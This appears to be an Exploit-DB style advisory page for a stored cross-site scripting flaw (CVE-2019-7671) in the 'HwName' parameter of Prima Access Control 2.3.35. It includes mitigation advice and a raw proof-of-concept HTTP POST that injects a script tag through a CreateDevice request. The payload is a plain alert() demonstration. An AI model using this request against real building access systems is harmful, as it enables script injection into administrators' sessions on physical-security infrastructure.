Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting

vendor:

Prima Access Control

by:

LiquidWorm

CVSS

CRITICAL

Persistent Cross-Site Scripting

CWE

Product Name: Prima Access Control

Affected Version From: 2.3.35

Affected Version To: 2.3.35

Patch Exists: YES

Related CWE: CVE-2019-7671

CPE: a:computrols:prima_access_control:2.3.35

Metasploit:

Other Scripts:

Platforms Tested: Not specified

2019

Prima Access Control 2.3.35 – ‘HwName’ Persistent Cross-Site Scripting

This exploit allows an attacker to perform a persistent cross-site scripting attack in the 'HwName' parameter of the Prima Access Control software version 2.3.35. By injecting malicious script code, an attacker can execute arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, users should update to the latest version of the Prima Access Control software. Additionally, input validation and sanitization should be implemented to prevent script injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7671
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS

# PoC

POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 265
Origin: https://192.168.13.37
Session-ID: 10127047
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>